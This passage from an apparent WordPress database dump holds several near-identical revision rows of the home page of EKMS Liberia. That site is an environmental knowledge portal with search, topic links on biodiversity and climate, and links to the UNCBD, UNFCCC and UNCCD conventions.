value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:35:59','2019-11-14 16:35:59','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2138,1,'2019-11-14 16:38:05','2019-11-14 16:38:05','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:38:05','2019-11-14 16:38:05','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2139,1,'2019-11-14 16:38:32','2019-11-14 16:38:32','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:38:32','2019-11-14 16:38:32','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2140,1,'2019-11-14 16:41:34','2019-11-14 16:41:34','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:41:34','2019-11-14 16:41:34','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2142,1,'2019-11-14 16:46:44','2019-11-14 16:46:44','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:46:44','2019-11-14 16:46:44','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2143,1,'2019-11-14 16:46:59','2019-11-14 16:46:59','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 16:46:59','2019-11-14 16:46:59','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2144,1,'2019-11-14 16:48:18','2019-11-14 16:48:18','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The 